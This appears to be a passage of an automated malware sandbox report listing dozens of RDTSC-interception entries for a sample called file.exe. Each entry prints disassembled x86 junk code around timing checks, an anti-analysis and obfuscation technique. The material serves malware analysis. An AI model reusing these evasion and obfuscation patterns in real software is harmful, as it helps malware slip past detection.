Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3CB second address: 9EE3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3CF second address: 9EE3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0ACF second address: 9F0AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0959F second address: A095B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0290h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A09759 second address: A0975F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0975F second address: A09763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C738 second address: A0C77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D3527h], esi 0x0000000f push 00000004h 0x00000011 add dl, FFFFFFEAh 0x00000014 call 00007F988C7CE319h 0x00000019 push ecx 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 jmp 00007F988C7CE329h 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 pushad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C77D second address: A0C7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B0296h 0x00000009 popad 0x0000000a jmp 00007F988D0B0292h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C7B2 second address: A0C7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C7B6 second address: A0C7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C7BA second address: A0C7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C9D7 second address: A0C9DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F9D4 second address: A0F9DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F9DA second address: A0F9FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F988D0B0294h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F988D0B0286h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F9FA second address: A0FA33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F988C7CE316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F988C7CE321h 0x00000017 jmp 00007F988C7CE326h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0FA33 second address: A0FA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F988D0B028Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1167E second address: A11698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE321h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11698 second address: A116A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116A0 second address: A116A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116A5 second address: A116B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F988D0B0286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116B0 second address: A116B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116B6 second address: A116D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B028Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F988D0B028Eh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116D3 second address: A116DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9241A5 second address: 9241BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9241BC second address: 9241C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9241C2 second address: 9241C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924365 second address: 924373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924373 second address: 924384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B028Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924384 second address: 924389 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290328 second address: 5290338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290338 second address: 529033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 529033C second address: 529034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 529034B second address: 5290352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290352 second address: 5290358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290358 second address: 5290379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F988C7CE324h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290379 second address: 529037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 529037F second address: 5290383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290383 second address: 5290387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0577 second address: 52C057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C057B second address: 52C0581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0581 second address: 52C05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C05A3 second address: 52C060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e pushfd 0x0000000f jmp 00007F988D0B028Ah 0x00000014 sub si, 5A18h 0x00000019 jmp 00007F988D0B028Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F988D0B0296h 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F988D0B0297h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C060F second address: 52C0615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0615 second address: 52C0678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F988D0B028Fh 0x00000013 sbb esi, 4AC0899Eh 0x00000019 jmp 00007F988D0B0299h 0x0000001e popfd 0x0000001f call 00007F988D0B0290h 0x00000024 mov dx, cx 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, ah 0x0000002f mov bx, 2A86h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0678 second address: 52C0691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, E4h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0691 second address: 52C0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0697 second address: 52C069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C069B second address: 52C06AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06AA second address: 52C06AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06AE second address: 52C06B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06B4 second address: 52C06FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 pushfd 0x00000011 jmp 00007F988C7CE329h 0x00000016 add si, 66A6h 0x0000001b jmp 00007F988C7CE321h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06FF second address: 52C0788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B0297h 0x00000009 adc ecx, 768139DEh 0x0000000f jmp 00007F988D0B0299h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F988D0B0290h 0x0000001b or ecx, 433F71D8h 0x00000021 jmp 00007F988D0B028Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a lea eax, dword ptr [ebp-04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx ebx, ax 0x00000033 pushfd 0x00000034 jmp 00007F988D0B028Ch 0x00000039 or ax, BC38h 0x0000003e jmp 00007F988D0B028Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0788 second address: 52C07F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F988C7CE31Ch 0x00000011 add eax, 2E80F5C8h 0x00000017 jmp 00007F988C7CE31Bh 0x0000001c popfd 0x0000001d mov edi, esi 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007F988C7CE31Bh 0x00000027 mov cx, 762Fh 0x0000002b popad 0x0000002c nop 0x0000002d jmp 00007F988C7CE322h 0x00000032 push dword ptr [ebp+08h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C07F7 second address: 52C07FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C07FD second address: 52C080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C086E second address: 52C0874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0874 second address: 52C0878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08B4 second address: 52C08BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08BA second address: 52C08DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F988C7CE31Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08DC second address: 52C08E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08E2 second address: 52B0030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 1AF3h 0x00000007 push esi 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e mov cx, 7D47h 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 leave 0x00000017 pushad 0x00000018 mov ebx, 5C1F73F8h 0x0000001d pushfd 0x0000001e jmp 00007F988C7CE321h 0x00000023 xor esi, 03C079E6h 0x00000029 jmp 00007F988C7CE321h 0x0000002e popfd 0x0000002f popad 0x00000030 retn 0004h 0x00000033 nop 0x00000034 cmp eax, 00000000h 0x00000037 setne al 0x0000003a xor ebx, ebx 0x0000003c test al, 01h 0x0000003e jne 00007F988C7CE317h 0x00000040 xor eax, eax 0x00000042 sub esp, 08h 0x00000045 mov dword ptr [esp], 00000000h 0x0000004c mov dword ptr [esp+04h], 00000000h 0x00000054 call 00007F9891337753h 0x00000059 mov edi, edi 0x0000005b jmp 00007F988C7CE321h 0x00000060 xchg eax, ebp 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F988C7CE328h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0030 second address: 52B0036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0036 second address: 52B0084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE31Ch 0x00000009 or esi, 5D2F1BD8h 0x0000000f jmp 00007F988C7CE31Bh 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F988C7CE325h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F988C7CE31Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0084 second address: 52B00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B0297h 0x00000009 adc eax, 2475F8AEh 0x0000000f jmp 00007F988D0B0299h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F988D0B028Ch 0x00000021 push FFFFFFFEh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F988D0B0297h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00ED second address: 52B00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00F3 second address: 52B00F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00F7 second address: 52B0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 003EEE11h 0x00000010 jmp 00007F988C7CE31Fh 0x00000015 xor dword ptr [esp], 76A47059h 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0127 second address: 52B014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, cl 0x00000006 popad 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a call 00007F988D0B0289h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F988D0B0292h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B014E second address: 52B016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988C7CE321h 0x00000008 mov ax, 40B7h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B016F second address: 52B0174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0174 second address: 52B01C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F988C7CE31Bh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F988C7CE329h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F988C7CE31Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01C4 second address: 52B01CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01CA second address: 52B0266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F988C7CE31Ch 0x00000013 xor cl, FFFFFFC8h 0x00000016 jmp 00007F988C7CE31Bh 0x0000001b popfd 0x0000001c mov ch, C0h 0x0000001e popad 0x0000001f mov eax, dword ptr fs:[00000000h] 0x00000025 jmp 00007F988C7CE31Bh 0x0000002a nop 0x0000002b jmp 00007F988C7CE326h 0x00000030 push eax 0x00000031 jmp 00007F988C7CE31Bh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F988C7CE31Bh 0x00000040 add eax, 12418F1Eh 0x00000046 jmp 00007F988C7CE329h 0x0000004b popfd 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0266 second address: 52B02F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988D0B0293h 0x00000008 mov si, CCCFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f sub esp, 18h 0x00000012 pushad 0x00000013 call 00007F988D0B0290h 0x00000018 mov esi, 6E2B0E51h 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007F988D0B0297h 0x00000024 and ax, 4F3Eh 0x00000029 jmp 00007F988D0B0299h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 mov ecx, 72BC1023h 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F988D0B0296h 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B02F5 second address: 52B0357 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edi, ax 0x0000000d push eax 0x0000000e mov bh, BAh 0x00000010 pop esi 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F988C7CE323h 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ecx, edi 0x0000001e pushfd 0x0000001f jmp 00007F988C7CE327h 0x00000024 xor ch, FFFFFFBEh 0x00000027 jmp 00007F988C7CE329h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0357 second address: 52B037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F988D0B028Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B037B second address: 52B038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B038D second address: 52B03CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushfd 0x00000010 jmp 00007F988D0B0290h 0x00000015 add eax, 3FA9BA78h 0x0000001b jmp 00007F988D0B028Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03CD second address: 52B03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03E8 second address: 52B03EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03EE second address: 52B03F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
